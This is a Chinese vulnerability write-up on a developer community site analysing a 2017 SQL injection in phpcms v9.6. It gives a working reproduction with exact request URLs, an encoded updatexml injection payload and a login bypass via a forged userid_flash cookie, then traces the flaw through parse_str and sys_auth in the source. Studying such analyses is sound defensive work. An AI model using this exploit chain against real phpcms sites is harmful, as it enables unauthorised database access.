开发者社区> 玄学酱> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

phpcms v9.6 注入漏洞详细分析

简介: 本文讲的是phpcms v9.6 注入漏洞详细分析,搭建环境,我在本地搭建域名为www.joke33.com的测试环境。 打开burpsuite,进行拦截。
+关注继续查看
本文讲的是phpcms v9.6 注入漏洞详细分析搭建环境,我在本地搭建域名为www.joke33.com的测试环境。

打开burpsuite,进行拦截。

phpcms v9.6 注入漏洞详细分析

打开火狐浏览器,访问有漏洞的网站。

http://www.joke33.com/index.php

phpcms v9.6 注入漏洞详细分析

在burpsuite下可以看到拦截到的数据包,然后选择repeater进行重放。

修改数据包访问,以GET方式访问如下url:

/index.php?m=wap&c=index&a=init&siteid=1

获取一个cookie值。

phpcms v9.6 注入漏洞详细分析

修改数据包,以POST的方式访问如下url:

/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26

传入userid_flash变量,变量的值为刚刚获取到的cookie的值

userid_flash=5ceb9go-1e01hkQc66J1WS7jTWMYriQh6lODXwUnLIiTZh_k

在数据包头的结尾添加(这一步必须要,要不然复现失败。应该数据包的格式要求)

content-Type:application/x-www-form-urlencoded
content-Length:53

提交数据包,回返回一段加密的密文,将这段密文复制下来。

phpcms v9.6 注入漏洞详细分析

修改数据包,以POST的方式访问如下url:

/index.php?m=content&c=down&a_k=b2d2BO0WDcSf_BpiZ3UMBtiFx_4FRMv_1Mf35JQNq_ct__4JuWjwgdJjKmtTIZDn5WJBrexM-Nfg7S9J3QwB8U6vrFk3Fti5iJIkK6Gp6B6-ZSZsRKN4emXDpQAEeOD_IzG3kJ8B8ybdHIdytB3yjB7VI8fLm6fojfZOuCMD2iiERJE4aSBOTBM

a_k的值为上一步返回的那段密文。

提交之后即可成功复现漏洞。

phpcms v9.6 注入漏洞详细分析

我们来分析一下这个漏洞。

我们将漏洞分析分为三个部分:

第一部分

根据最后注入的漏洞url,跟进到phpcmsphpcmsmodulescontentdown.php文件

跟进到init()函数,这边的这几行代码是将$a_k的值进行解密

phpcms v9.6 注入漏洞详细分析

我们echo一下解密后的值

phpcms v9.6 注入漏洞详细分析

现在$a_k里面是一个字符串。

程序在后面会使用parse_str对每个变量进行赋值。(有些变量覆盖漏洞就是parse_str这个函数搞得事情)

phpcms v9.6 注入漏洞详细分析

这里我们分析一下parse_str函数,parse_str函数是将字符串解析成多个变量。

百度了一下,parse_str的大概格式如下:

parse_str("first=value&two=fooz");

中间有一个“&”符号,没有“&”符号会出错

所以,我们在进行注入的时候写的注入语句是

&id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&

而不是

id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&

如果没有“&”符号,会发现注入的参数会变成空值,那就没有注入漏洞了

经过parse_str函数后,id的值就变成了可注入的值

phpcms v9.6 注入漏洞详细分析

跟进代码的第26行,程序直接用get_one函数带入有注入的语句进行数据库查询,所以导致了sql注入。

phpcms v9.6 注入漏洞详细分析

这边注入点的难点在于,怎么获取有漏洞$a_k,我们接下来看下怎么获取有漏洞$a_k值。

第二部分

跟着漏洞的思路,我们跟进到phpcmsphpcmsmodulesattachmentattachments.php文件

来到241行

phpcms v9.6 注入漏洞详细分析

发现这个src参数有经过safe_replace()函数的处理,但是并没有其他的过滤,我们可以拿过来利用。

我们以get方式传入有注入的src值,传入的参数会被记录到cookie的att_json里面。

phpcms v9.6 注入漏洞详细分析

这里面还有一个问题。

我们调用的swfupload_json()函数是在attachments这个类中,这个类有一个构造函数__construct。

phpcms v9.6 注入漏洞详细分析

我们看到构造函数会判断是否登录。

但是依据第17行的代码,我们可以知道,如果我们POST一个正常存在的userid_flash值,是可以绕过登录判断的。

我们跟进到sys_auth()函数

phpcms v9.6 注入漏洞详细分析

该函数是phpcms内cookie的加密解密函数,所有cookies下加密解密都会经过这个函数。

swfupload_json()函数调用的是sys_auth()的DECODE方式,也就是解密方式,我们可以找到一个调用的是sys_auth()的ENECODE方式的函数就能绕过了。

第三部分

我们跟进到phpcmsphpcmsmoduleswapindex.php文件

看下这个构造函数

phpcms v9.6 注入漏洞详细分析

跟进到set_cookie()函数

phpcms v9.6 注入漏洞详细分析

我们可以看到,set_cookie()这边调用了sys_auth()并且是ENCODE方式,并且计算出来的值保存在cookie里面,我们是可以获取到的。

那我们就可以拿过来用了,到这边我们就可以绕过登录限制了。




原文发布时间为:2017年5月9日
本文作者:angle
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
PHPCMS后台首页去掉开发者信息
打开文件:phpcms/modules/admin/templates下面的main.tpl.php 用下面代码替换掉文件原来代码: $(function(){if ($.
939 0
phpcms v9 模板标签说明大全
{template "content","header"} 调用根目录下phpcms\template\content\header文件 {CHARSET} 字符集 (gbk或者utf-8) {if isset($SEO['title']) && !empty($SEO['title'])} {$SEO['title']}{/if} {$SEO['site_ti
1446 0
PHPCMS广告模块详细分析——广告的生成
本文章为原创内容,转载请注明出处。 上周班上的小范同学问我广告模块怎么设计,我说你去参考phpcms啊,他上面的广告模块设计的很不错呢。 那么,就让我们开始吧。 PHPCMS广告模块详细分析——广告的生成 一、功能。
1093 0
dedecms最新注入漏洞
作者:张恒 # Gh0u1:我没测试,先保留一下,晚上再说。 dedecms5.3和5.
933 0
+关注
玄学酱
这个时候,玄酱是不是应该说点什么...
文章
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载